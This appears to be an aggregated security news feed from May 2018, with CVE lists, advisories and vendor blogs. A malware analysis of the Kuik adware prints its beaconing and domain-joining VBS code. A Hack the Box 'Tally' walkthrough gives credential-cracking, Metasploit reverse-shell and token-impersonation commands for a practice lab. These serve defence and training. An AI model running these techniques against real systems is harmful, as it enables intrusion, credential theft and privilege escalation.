CVE-2018-8178 - Microsoft Browser Memory Corruption Vulnerability
CVE-2018-0946 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0951 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0953 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0954 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0955 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8114 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8122 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8137 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-0945 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-1022 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8139 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8128 - Scripting Engine Memory Corruption Vulnerability
CVE-2018-8133 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-0943 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8130 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8177 - Chakra Scripting Engine Memory Corruption Vulnerability

Important Vulnerabilities

This month, Microsoft is addressing 42 vulnerabilities that are rated important.

CVE-2018-8120 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8123 - Microsoft Edge Memory Corruption Vulnerability
CVE-2018-8124 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8147 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8148 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8157 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8158 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8161 - Microsoft Office Remote Code Execution Vulnerability
CVE-2018-8162 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2018-8164 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8165 - DirectX Graphics Kernel Elevation of Privilege Vulnerability
CVE-2018-8166 - Win32k Elevation of Privilege Vulnerability
CVE-2018-8167 - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2018-8179 - Microsoft Edge Memory Corruption Vulnerability
CVE-2018-0765 - .NET and .NET Core Denial of Service Vulnerability
CVE-2018-0824 - Microsoft COM for Windows Remote Code Execution Vulnerability
CVE-2018-0854 - Windows Security Feature Bypass Vulnerability
CVE-2018-0958 - Windows Security Feature Bypass Vulnerability
CVE-2018-1021 - Microsoft Edge Information Disclosure Vulnerability
CVE-2018-1025 - Microsoft Browser Information Disclosure Vulnerability
CVE-2018-1039 - .NET Framework Device Guard Security Feature Bypass Vulnerability
CVE-2018-8112 - Microsoft Edge Security Feature Bypass Vulnerability
CVE-2018-8119 - Azure IoT SDK Spoofing Vulnerability
CVE-2018-8126 - Internet Explorer Security Feature Bypass Vulnerability
CVE-2018-8127 - Windows Kernel Information Disclosure Vulnerability
CVE-2018-8129 - Windows Security Feature Bypass Vulnerability
CVE-2018-8132 - Windows Security Feature Bypass Vulnerability
CVE-2018-8134 - Windows Elevation of Privilege Vulnerability
CVE-2018-8141 - Windows Kernel Information Disclosure Vulnerability
CVE-2018-8145 - Chakra Scripting Engine Memory Corruption Vulnerability
CVE-2018-8149 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8150 - Microsoft Outlook Security Feature Bypass Vulnerability
CVE-2018-8151 - Microsoft Exchange Memory Corruption Vulnerability
CVE-2018-8152 - Microsoft Exchange Server Elevation of Privilege Vulnerability
CVE-2018-8155 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8156 - Microsoft SharePoint Elevation of Privilege Vulnerability
CVE-2018-8159 - Microsoft Exchange Elevation of Privilege Vulnerability
CVE-2018-8160 - Microsoft Outlook Information Disclosure Vulnerability
CVE-2018-8163 - Microsoft Excel Information Disclosure Vulnerability
CVE-2018-8170 - Windows Image Elevation of Privilege Vulnerability
CVE-2018-8173 - Microsoft InfoPath Remote Code Execution Vulnerability
CVE-2018-8897 - Windows Kernel Elevation of Privilege Vulnerability


In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:
 46538 - 46539,
 46544 - 46549,
 46552 - 46565,
 46594 - 46597,
 46601 - 46604

Cisco FXOS and NX-OS System Software Authentication, Authorization, and Accounting Denial of Service Vulnerability

A vulnerability in the authentication, authorization, and accounting (AAA) implementation of Cisco Firepower Extensible Operating System (FXOS) and NX-OS System Software could allow an unauthenticated, remote attacker to cause an affected device to reload.

The vulnerability occurs because AAA processes prevent the NX-OS System Manager from receiving keepalive messages when an affected device receives a high rate of login attempts, such as in a brute-force login attack. System memory can run low on the FXOS devices under the same conditions, which could cause the AAA process to unexpectedly restart or cause the device to reload.

An attacker could exploit this vulnerability by performing a brute-force login attack against a device that is configured with AAA security services. A successful exploit could allow the attacker to cause the affected device to reload.

Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

Note: Previous versions of this advisory recommended upgrading the Cisco NX-OS Software Release and configuring the login block-for CLI command to prevent this vulnerability. Cisco has since become aware that the login block-for CLI command may not function as desired in all cases. This does not apply to Cisco FXOS. Please refer to the Details section for additional information.

This advisory is available at the following link:
Security Impact Rating: High
CVE: CVE-2017-3883

Microsoft Releases May 2018 Security Updates

Original release date: May 08, 2018

Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Microsoft's May 2018 Security Update Summary and Deployment Information and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

CVE-2018-6511 (puppet)

A cross-site scripting vulnerability in Puppet Enterprise Console of Puppet Enterprise allows a user to inject scripts into the Puppet Enterprise Console when using the Puppet Enterprise Console. Affected releases are Puppet Puppet Enterprise: 2017.3.x versions prior to 2017.3.6.

CVE-2018-6510 (puppet)

A cross-site scripting vulnerability in Puppet Enterprise Console of Puppet Enterprise allows a user to inject scripts into the Puppet Enterprise Console when using the Orchestrator. Affected releases are Puppet Puppet Enterprise: 2017.3.x versions prior to 2017.3.6.

CVE-2017-2611 (jenkins)

Jenkins before versions 2.44, 2.32.2 is vulnerable to an insufficient permission check for periodic processes (SECURITY-389). The URLs /workspaceCleanup and /fingerprintCleanup did not perform permission checks, allowing users with read access to Jenkins to trigger these background processes (that are otherwise performed daily), possibly causing additional load on Jenkins master and agents.

Big Brother vs. Little Brother: Mapping Where Our Personal Information Goes

More and more, the news is filled with stories about how personal information is being used to benefit others. From revelations after Mark Zuckerberg’s pseudo mea culpa in front of Congress last month, to stories about fake news, identity theft, and how data mining is being used by political campaigns to understand the demographics and psychographics of potential voters, these Little Brothers are collecting massive amounts of personal data – all with our tacit consent.

St. Kitts and Nevis Pass the Data Protection Bill 2018

On May 4, 2018, St. Kitts and Nevis’ legislators passed the Data Protection Bill 2018 (the “Bill”). The Bill was passed to promote the protection of personal data processed by public and private bodies.

Attorney General the Honourable Vincent Byron explained that the Bill is largely derived from the Organization of Eastern Caribbean States model and “seeks to ensure that personal information in the custody or control of an organization, whether it be a public group like the government, or private organization, shall not be disclosed, processed or used other than the purpose for which it was collected, except with the consent of the individual or where exemptions are clearly defined.”

Read more about the Bill.

Massive localstorage[.]tk Drupal Infection

Massive localstorage[.]tk Drupal Infection

After a series of critical Drupal vulnerabilities disclosed this spring, it’s not surprising to see a surge of massive Drupal infections like this one:

Massive #Drupal infection that redirects to "Tech Support" scam via "js.localstorage[.]tk" https://t.co/30ZeLIyfza pic.twitter.com/ZCPMepM74k

— Denis (@unmaskparasites) April 24, 2018

… with over a thousand compromised sites that redirect visitors to “Tech support” scam pages.

Malicious Injections

The infected pages contain the following JavaScript code, which is injected into various .tpl.php, .html.twig and .js files.

Continue reading Massive localstorage[.]tk Drupal Infection at Sucuri Blog.

Hackers Found Using A New Way to Bypass Microsoft Office 365 Safe Links

Security researchers revealed a way around that some hacking groups have been found using in the wild to bypass a security feature of Microsoft Office 365, which is originally designed to protect users from malware and phishing attacks. Dubbed Safe Links, the feature has been included in Office 365 software as part of Microsoft's Advanced Threat Protection (ATP) solution that works by replacing

CVE-2017-2592 (oslo.middleware, ubuntu_linux)

python-oslo-middleware before versions 3.8.1, 3.19.1, 3.23.1 is vulnerable to an information disclosure. Software using the CatchError class could include sensitive values in a traceback's error message. System users could exploit this flaw to obtain sensitive information from OpenStack component error logs (for example, keystone tokens).

CVE-2017-2594 (hawtio)

hawtio before versions 2.0-beta-1, 2.0-beta-2 2.0-m1, 2.0-m2, 2.0-m3, and 1.5 is vulnerable to a path traversal that leads to a NullPointerException with a full stacktrace. An attacker could use this flaw to gather undisclosed information from within hawtio's root.

Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protect helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best in class security solution especially when the person does not use Microsoft Edge with the benefits of its web protection. In our web-based scenario, the user can access the website through another browser, download the “software update” and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors and figure 1 summarizes the services which help to detect threats.

Ransomware Detection with Microsoft 365
Windows Defender Advanced Threat Protection
Azure Advanced Threat Protection
Microsoft Cloud App Security
Azure Security Center
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATPs (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Todays most sophisticated ransomware is designed to spread laterally across networks increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the intelligent security graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute force password method to move laterally through a network which our Azure ATP service is specifically designed to detect. A brute force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP and with signals shared from WDATP, the anomaly would be quickly assigned to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity; for example, a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities, such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.

Azure Security Center is also connected with WDATP and provides infrastructure level alerts and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial as WDATP also shares the signal with Office 365 and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATPs real-time reporting and Office 365 threat intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office ATP and Office threat intelligence services also track threats found in SharePoint Online, OneDrive for Business, and Teams so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.

More blog posts from this series:

Kuik: a simple yet annoying piece of adware

Some pieces of malware can be so simple—and yet such a pain to get rid of—especially when they start interfering with your system’s configuration. This much is true for the Kuik adware program, which surprised us all by forcing affected machines to join a domain controller.

The perpetrators are using this unusual technique to push Google Chrome extensions and coin miner applications to their victims. In this blog, we’ll provide technical analysis of this adware and custom removal instructions.

Technical description

Stage 1 – .NET installer


The first stage is written in .NET with an icon imitating the Adobe Flash Player. This is typical of bundlers that promise to update software components but also add their own code to the original installer.

After opening with a dotNet decompiler (i.e. dnSpy), we found that the project’s original name was WWVaper.

It has three resources inside:

  • a certificate (svr.crt)
  • a legitimate Flash (decoy)
  • a next stage component (upp.exe)

The certificate:


Details of the certificate:

The certificate points to a DNS name of yahoo.com. However, the certification path is invalid:

The .NET installer is responsible for installing the malicious certificate and other components. First, it enumerates the network interfaces and adds collected IPs to the list:

Then, it adds a new IP as a DNS ( to the collected interfaces. It also installs its own certificate (svr.crt):

Stage 2 – upp.exe

This application is an installer bundle that is not obfuscated. Inside, we found a cabinet file:

It contains other modules to be dropped:

The application “install.exe” is deployed with the “setup.bat” as a parameter.

Stage 3 – unpacked components from the cabinet

The application install.exe is basic. Its only role is to run the next process in elevated mode. Below, you can see its main function:

The script setup.bat deploys another component named SqadU9FBEV.bat:

It delays execution by pinging Then, it runs the second encoded script, giving it a campaign ID as a parameter:

The next element deployed is an encoded VBS script:

After decoding it (with this decoder), we saw this script in clear: NYkjVVXepl.vbs. We also saw that it fingerprints the system and beacons to a server:

Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem") 
for each System in SystemSet 
  winVer = System.Caption 
Function trackEvent(eventName, extraData)
  Set tracking = CreateObject("MSXML2.XMLHTTP")
  tracking.open "GET", "http://eventz.win:13463/trk?event=" & eventName & "&computer=" & UUID & "&windows-version=" & winVer & "&error=" & err.Number & ";" & err.Description & ";" & err.Source & ";" & extraData & "&campaign=qavriknzkk&channel=" & WScript.Arguments.Item(0), False
End Function

The interesting fragment is about adding the infected computer to a domain:

SET objNetwork = CREATEOBJECT("WScript.Network")
strComputer = objNetwork.ComputerName
SET objComputer = GetObject("winmgmts:" & "{impersonationLevel=Impersonate,authenticationLevel=Pkt}!\\" & strComputer & "\root\cimv2:Win32_ComputerSystem.Name='" & strComputer & "'")
ReturnValue = objComputer.JoinDomainOrWorkGroup("kuikdelivery.com", "4sdOwt7b7L1vAKR6U7", "kuikdelivery.com\administrator", "OU=" & WScript.Arguments.Item(0) & ",DC=kuikdelivery,DC=com", JOIN_DOMAIN + ACCT_CREATE + DOMAIN_JOIN_IF_JOINED + JOIN_UNSECURE)
If (ReturnValue  0) Or (err.number  0) Then
  trackEvent "join-domain-failed", ReturnValue
  WScript.Quit 1
  trackEvent "join-domain-success", Null
  WScript.Quit 0
End IF


There are a range of payloads being used by this program, but bogus Chrome extensions seem to be a particular favorite. In addition, some coin miners are being served:


Malwarebytes users (version 3.x) can remove this threat from their system by running a full scan. The removal includes unjoining the malicious domain controller to restore your machine to its original state.

Indicators of compromise



Chrome extensions




The post Kuik: a simple yet annoying piece of adware appeared first on Malwarebytes Labs.

Hack the Box Challenge: Tally Walkthrough

Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Tally Lab has IP:

Now, as always let’s begin our hacking with the port enumeration.

nmap -p- -A

When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in above image.

Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found ftp username as shown below in the image.

Moreover, I found a link for SharePoint directory brute-force attack that helps me in my next step.

We found this URL documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as shown below, you will see a file named “ftp-details”. Download this doc file and open it.

You will get a password from inside ftp details doc file.

Now login into FTP using following credentials and download tim.kdbx in your local machine.

Username: ftp_user
Password: UTDRSCH53c"$6hys

Since the file contains .kdbx extension and I don’t know much about it, therefore, I jumped for Google search from there I got this link to download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

python keepass2john.py tim.kdbx > tim

Next, we have used John the ripper for decrypting the content of “tim” with help of the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim

When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:

apt-get install keepass2 -y

After installing, run the below command and submit “simplementeyo” in the field of the master key.

keepass2 tim.kdbx

Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login, since port 135-445 are open in targets machine for sharing files.

Here the password is hidden inside * character; copy and paste it into a text file and you will get the password into plain letters I.e. Acc0unting .

Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.

smbclient -L -U Finance

Further type below commands and at last when you found conn-info.txt, download it.

smbclient // -U Finance
cd zz_Archived
cd SQL
get conn-info.txt

When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.

db: sa
pass: YE%TJC%&HYbe5Nw

 From below image you can observe that, it was old server details and might be the password for sa has been changed now.

Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:

smbclient // -U Finance
cd zz_Migration
cd Binaries
cd "New folder"

Here you will found tester.exe, download it.

get tester.exe

You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.

strings tester.exe | grep DATABASE

And you will get a new password for user sa as shown in below image.

For next step I took help from our previous article which was on MSSQL penetration testing. Open a new terminal and load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
msf exploit(multi/script/web_delivery) > set srvhost
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for .dll and Paste it inside as CMD command as shown in next image.

Now open new terminal and again load a new metasploit framework and execute below commands.

use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit

You will get meterpreter session of victim’s machine in your 1st metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:


So currently we don’t have NT AUTHORITY\SYSTEM permission.

But we have successfully grabbed user.txt file from inside /Sarah/Desktop.

cd Sarah/Desktop
cat user.txt

In this way we have completed our first task. Now let’s find root.txt!!

load incognito

Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system

list_token -u

If we talk related to impersonate token then you can see currently there is no token available.

Then I took help from Google in such scenario and found a link for downloading Rottenpotato from github for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

After downloading it will give rottenpotato.exe file.

Upload the exe file into victim’s machine.

upload /root/Desktop/RottenPotato/rottenpotato.exe .

Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

After then when you will run getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM

Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.

cd Administrator
cd Desktop
cat root.txt

Fabulous!! The task has been completed and hacked this box.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Tally Walkthrough appeared first on Hacking Articles.

Despite Major Data Breaches, Users’ Bad Password Security Habits Haven’t Improved

Even though password security is a top priority for organizations, only 55 percent of users would change their credentials after a breach. That’s the sobering state of affairs detailed in “The Psychology of Passwords: Neglect Is Helping Hackers Win,” a new report from password management firm LastPass.

And bad habits don’t stop there. The report also found that 59 percent of respondents use the same password across multiple accounts. Despite the rising costs of data breach recovery and ongoing, large-scale compromises, LastPass found that “password behaviors remain largely unchanged from two years ago.”

A Persistent Problem

Companies around the world and across all sectors are struggling to protect user passwords. As noted by Wired, Twitter recently disclosed that it had inadvertently stored unencrypted passwords in an internal system. While Twitter typically hashes user passwords using bcrypt, a bug in its hashing protocol led to the unprotected storage of credentials that were kept even after hashing was complete.

Although the company said it doesn’t believe the information was accessed or used by cybercriminals, it advised all users to change their passwords for good measure. As noted by the LastPass report, however, just over half of users are likely to comply.

Also problematic is the common practice of employees sharing passwords for internal resources using tools such as Trello. According to Krebs on Security, simple web searches revealed “unprotected personal Trello boards that listed employer passwords and other sensitive data.”

This lines up with LastPass data, which found that, while 5 million records are compromised every day, it still takes organizations an average of 66 days to contain a breach. Posting passwords on public collaboration forums makes containment that much more difficult.

The Password Security Paradox

As noted by TechRepublic, the new report “confirms the paradoxical views many people have about passwords and highlights alarming trends in personal online security.” For example, 90 percent of users said they believe their online accounts are at risk regardless of the strength of their passwords and 91 percent recognize that password reuse heightens this risk. Meanwhile, 39 percent reported that they would never change their password if they were not required to do so.

Users also underestimated their total number of online accounts. While 79 percent of those asked said they had between one and 20 online accounts, LastPass found that, on average, employees were responsible for 191 passwords. Still, 59 percent of respondents said they mostly or always use the same password for different accounts, 51 percent don’t believe that cybercriminals can figure out their password, and 21 percent said they don’t see a problem with repeating the same password across accounts.

There’s a gap between user belief and behavior. Ninety-two percent of respondents said password security was a “serious matter,” yet 61 percent said they refuse to change passwords for fear of forgetting their login information.

Sandor Palfy, chief technology officer (CTO) of identity and access management at LastPass parent company LogMeIn, put it simply: “The cyberthreats facing consumers and businesses are becoming more targeted and successful, yet there remains a clear disconnect in users’ password beliefs and their willingness to take action.”

The post Despite Major Data Breaches, Users’ Bad Password Security Habits Haven’t Improved appeared first on Security Intelligence.

CVE-2018-1000177 (s3_publisher)

A cross-site scripting vulnerability exists in Jenkins S3 Plugin 0.10.12 and older in src/main/resources/hudson/plugins/s3/S3ArtifactsProjectAction/jobMain.jelly that allows attackers able to control file names of uploaded files to define file names containing JavaScript that would be executed in another user's browser when that user performs some UI actions.

CVE-2018-1000176 (email_extension)

An exposure of sensitive information vulnerability exists in Jenkins Email Extension Plugin 2.61 and older in src/main/resources/hudson/plugins/emailext/ExtendedEmailPublisher/global.groovy and ExtendedEmailPublisherDescriptor.java that allows attackers with control of a Jenkins administrator's web browser (e.g. malicious extension) to retrieve the configured SMTP password.

CVE-2018-1000168 (nghttp2)

nghttp2 version >= 1.10.0 and nghttp2 <= v1.31.0 contains an Improper Input Validation CWE-20 vulnerability in ALTSVC frame handling that can result in segmentation fault leading to denial of service. This attack appears to be exploitable via network client. This vulnerability appears to have been fixed in >= 1.31.1.

National Standard on Personal Information Security Goes into Effect in China

On May 1, 2018, the Information Security Technology – Personal Information Security Specification (the “Specification”) went into effect in China. The Specification is not binding and cannot be used as a direct basis for enforcement. However, enforcement agencies in China can still use the Specification as a reference or guideline in their administration and enforcement activities. For this reason, the Specification should be taken seriously as a best practice in personal data protection in China, and should be complied with where feasible.

The Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents. It includes (without limitation) basic principles for personal information security, notice and consent requirements, security measures, rights of data subjects and requirements related to internal administration and management. The Specification establishes a definition of sensitive personal information, and provides specific requirements for its collection and use.

Read our previous blog post from January 2018 for a more detailed description of the Specification.

Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat

Malicious crypto-miners have supplanted ransomware as the top healthcare cybersecurity threat, a cross-sector report revealed.

The April 2018 edition of the Healthcare Information and Management Systems Society (HIMSS)’s “Healthcare and Cross-Sector Cybersecurity Report,” which referenced the recent “Comodo Cybersecurity Q1 2018 Report,” found that crypto-miner attacks increased over the course of the quarter while ransomware attacks decreased.

Comodo’s researchers also noted that attackers are debuting innovations for embedding malware within crypto-miners, a trend that could indicate a preference among bad actors for cryptojacking over more traditional threats.

Crypto-Miners, Backdoors and More

On June 11 at the Healthcare Security Forum, Lee Kim, privacy and security director for HIMSS, will present her a talk titled “Through the Looking Glass: What’s Happening Now and in the Future.” Her session will expand on some of the findings from the April 2018 HIMSS report.

In addition to crypto-miners, HIMSS featured other threats in its roundup, including an authentication bypass vulnerability that facilitates code execution with root privileges on some ASUS routers. The report noted that public exploits are readily available for this weakness.

HIMSS also covered a threat group targeting healthcare firms with a custom backdoor, a remote code execution vulnerability in the 7-Zip program and a Python-based crypto-miner that uses the ETERNALROMANCE exploit to spread to vulnerable Windows PCs.

Improving Healthcare Cybersecurity, One Asset at a Time

Ahead of her presentation at the Healthcare Security Forum, Lee advised healthcare organizations to take inventory of their assets’ locations and configurations. That way, security teams will be in a better position to defend the network from national-state actors, criminals and zealous competitors.

“Think like an attacker and a defender,” she advised, as quoted by Healthcare IT News. “Know how the enemy moves, what they go after, and who they may be — this intelligence can go a long way.”

Lee also emphasized the importance of establishing communication channels for defending against phishing emails.

The post Crypto-Miners Supplant Ransomware as the Top Healthcare Cybersecurity Threat appeared first on Security Intelligence.

With More Than 1,200 Cybersecurity Vendors in the Industry, How Do You Stand Out?

Like most who attend RSA, I set a goal for myself to walk through the North and South exhibit halls and stop by every booth to “keep up” with the latest messaging and capabilities across the cyber landscape. I started off the day optimistic and full of enthusiasm. This year, I decided to keep track of the booths I visited even if it was just for a brief few seconds. I went to 287 booths in the North Hall and 279 in the South Hall. That’s right: I counted and hit 566 booths in a little over three hours.

What did I learn from this year’s event? Aside from the latest industry buzzwords and jargon, — threat sharing, machine learning, AI, data lakes, SOC automation, attack surface discovery and exploitation — every vendor sounded the same, and you had to go beyond the surface level to find out how they differentiate themselves.

I left disappointed that not once did I hear a vendor talk about helping customers by focusing on their desired outcomes, value and service level agreements.

Our marketing team recently released the following data points, which I believe are telling of where we are as an industry.

More than 1,200 vendors compete in the cybersecurity market today. Conservatively, if each vendor offers an average of three products, with each product carrying an average of five features, that would make the cybersecurity market replete with nearly 20,000 features.

There is no shortage of competition for features in our industry. Look at most cybersecurity vendor websites and you’ll find lots of content around product capabilities. It’s no wonder customers are under assault by relentless adversaries. Each new threat vector requires a new defensive technology, which typically takes the form of a new product (if not a new vendor), complete with its own set of features.

That’s why McAfee focuses on sound architectural principles when designing modernized cybersecurity environments. We provide an open, proactive and intelligent architecture to protect data and stop threats from device to cloud. This allows customers to onboard new defensive technologies quickly to maximize their effectiveness. And, with our open, integrated approach, customers benefit from an overall security system with a whole greater than the sum of its parts. They get the benefit of both worlds: abundant vendor choice within a unified, cohesive system.

RSA 2019 Goals: Find vendors who are talking about solving customer challenges by focusing on outcomes, architecture interoperability, efficacy and efficiencies with some service level agreements mixed in for good measure. I really believe McAfee is setting a new higher standard for the cyber landscape that is essential and meaningful to our customers and the partner ecosystem. Let’s see if anybody else does something similar (or, if anybody else follows suit, or something like that).

The post With More Than 1,200 Cybersecurity Vendors in the Industry, How Do You Stand Out? appeared first on McAfee Blogs.

Video: State of the Current Threat Landscape (RSA 2018)

During this year's RSA Conference, Highwire PR and WSJ Pro Cybersecurity hosted several panel discussions, including this one with CA Veracode CTO Chris Wysopal. Chris joined Andrea Limbago, chief social scientist at Endgame, Michael Daniel, president and CEO of Cyber Threat Alliance, to talk about the current and evolving threat landscape. Throughout the panel, you'll learn more about how automation is changing the game when it comes to security, why your application security and detection game has to be on point, why the future of development will be secure by design - and more.



IDG Contributor Network: Don’t fall off the log!

In the world of datacenter security, a firewall is often seen as the ultimate protector—the final perimeter of defense. In the public cloud however, the perimeter is fluid, and simple software configuration changes can change the perimeter. You can ruggedize your firewall as much as possible, but it can be bypassed. IT and security managers today are well aware of this possibility and, as a result, use extra layers of security: configuration management solutions, anti-viruses (or other endpoint solutions), WAF, DLP, IDS and other “homemade” monitoring solutions.

The common denominator of all these solutions is the vast array of generated logs because they are needed to thoroughly monitor an IT environment. Log absence results in blind spots in your infrastructure and potentially leaves you vulnerable to threats. Orchestrating a cybersecurity solution typically results in a large volume of logs from multiple sources and systems (typically gigabytes per day). Log management at scale is now a core discipline of security operations in the cloud. Effective log management needs to address two key questions: 1. Which logs to store and how, and 2. How to analyze log data effectively.

To read this article in full, please click here

IDG Contributor Network: 6 takeaways (and 3 predictions) from CISO meetings at the RSA Conference

Here’s the problem: at my normal rate of approximately two conversations with Chief Information Security Officers (CISOs) per month, the “present discounted value” of the information gathered never quite brings this picture into clear focus – this is where the RSA Conference comes to the rescue.

Lessons learned from RSA Conference 2018

If you work in the cybersecurity industry, April was marked on your calendar as the month the now mammoth RSA Conference that took place in San Francisco. While this is always a time to catch up with former colleagues who also work in the security business, it also presents a unique opportunity to meet with many CISOs in a short span of time. I personally took part in approximately 12 meetings with CISOs over a span of three days.

